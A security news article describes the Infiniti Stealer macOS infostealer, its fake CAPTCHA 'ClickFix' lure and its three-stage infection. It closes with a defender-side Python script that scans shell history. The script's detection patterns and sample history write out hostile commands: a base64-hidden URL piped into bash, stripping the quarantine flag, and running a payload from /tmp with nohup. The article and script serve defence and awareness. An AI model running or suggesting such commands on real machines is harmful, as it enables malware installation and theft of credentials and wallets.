A new macOS infostealer called Infiniti Stealer is being spread through fake Cloudflare-style CAPTCHA pages, marking a shift in social engineering attacks targeting Apple users.
Initially tracked as “NukeChain” during threat hunting, the malware’s identity was later confirmed when its operator panel became publicly accessible.
Unlike traditional malware that exploits software vulnerabilities, Infiniti Stealer uses a method called ClickFix. This technique tricks users into running malicious commands themselves, allowing the attack to bypass many security systems.
The attack starts with a fake verification page hosted on domains like update-check[.]com. It mimics a Cloudflare CAPTCHA and asks users to verify identity by opening Terminal and pasting a command. The command uses a base64-encoded URL to fetch a remote script and silently begin the infection process.
Because the user runs the command themselves, the activity looks like ordinary administrative use and is much harder to flag as malicious. The method, earlier seen on Windows, has now been adapted for macOS with instructions such as pressing Command + Space to open Terminal.
The malware works in three stages.
Stage 1: Bash Dropper
A Bash script decodes a hidden payload, writes a second file to the /tmp directory, removes Apple’s quarantine flag using xattr, and runs it in the background using nohup. It also sends command-and-control details, deletes itself, and closes the Terminal.
Stage 2: Nuitka Loader
A compiled Mach-O binary of about 8.6 MB, built using Nuitka, runs next. Nuitka compiles Python source to C, which makes the binary harder to analyse. The file includes a “KAY” header and extracts around 35 MB of data before launching the final payload.
Stage 3: Python Stealer Payload
The final file, UpdateHelper[.]bin, is a Python 3.11-based infostealer. It targets browser data, macOS Keychain entries, cryptocurrency wallets, and developer secrets in .env files. It also captures screenshots and sends data through HTTP POST requests.
Before stealing data, the malware checks for analysis tools like Any.Run, Joe Sandbox, Hybrid Analysis, VMware, and VirtualBox, and adds random delays to avoid detection. It then alerts the operator via Telegram and prepares stolen data for further use.
This campaign highlights a growing threat to macOS systems, challenging the belief that Apple devices are less vulnerable. It also reinforces that no legitimate CAPTCHA will ever ask users to paste commands into Terminal.
Users who interacted with such pages should stop sensitive activities, change passwords from a clean device, revoke active sessions and API keys, check folders such as /tmp and ~/Library/LaunchAgents/ for unfamiliar files, and run a full system scan.
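As an added defender-side example (not code from the article or any vendor tool), the following Python script flags shell-history lines that show the Stage 1 dropper pattern described above: a base64-encoded URL decoded and piped into a shell, the quarantine flag stripped with xattr, and a payload launched from /tmp under nohup. It complements the /tmp and LaunchAgents check recommended above; the regex indicators, the sample history, the example.invalid URL and the UpdateHelper.bin file name are all constructed placeholders.

```python
import base64
import re

# Constructed indicators for the dropper behaviour described above: a base64-
# encoded URL decoded and piped into a shell, the quarantine flag stripped with
# xattr, and a payload launched from /tmp under nohup. Not vendor signatures.
INDICATORS = {
    "decode-piped-to-shell": re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b"),
    "remote-fetch-piped-to-shell": re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z)?sh\b"),
    "quarantine-flag-removed": re.compile(r"xattr\s+(?:-d|-rd|-r\s+-d)\s+com\.apple\.quarantine"),
    "background-exec-from-tmp": re.compile(r"nohup\s+\S*/tmp/\S+.*&"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")  # zsh extended-history metadata

def decoded_urls(cmd):
    """Return http(s) URLs hidden inside base64 tokens of one command line."""
    urls = []
    for token in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        urls += re.findall(r"https?://\S+", text)
    return urls

def classify(cmd):
    """Return the names of every indicator a single shell command matches."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if decoded_urls(cmd):
        hits.append("base64-encoded-url")
    return hits

def scan_history(lines):
    """Return (line_no, command, indicators) for each history line that matches."""
    findings = []
    for no, raw in enumerate(lines, 1):
        cmd = ZSH_PREFIX.sub("", raw.strip())
        if hits := classify(cmd):
            findings.append((no, cmd, hits))
    return findings

# Constructed sample history (not real IoCs): one benign command and three that
# mirror the chain in the article. On a real host, read ~/.zsh_history instead.
SAMPLE_B64 = base64.b64encode(b"https://example.invalid/install.sh").decode()
SAMPLE_HISTORY = [
    ": 1700000000:0;ls -la ~/Library/LaunchAgents",
    f': 1700000001:0;curl -fsSL "$(echo {SAMPLE_B64} | base64 -d)" | bash',
    ": 1700000002:0;xattr -d com.apple.quarantine /tmp/UpdateHelper.bin",
    ": 1700000003:0;nohup /tmp/UpdateHelper.bin >/dev/null 2>&1 &",
]
```

Calling scan_history over the lines of ~/.zsh_history or ~/.bash_history returns every matching command with the indicators it triggered and, for base64 tokens, the decoded URL so the download source can be blocked and reported.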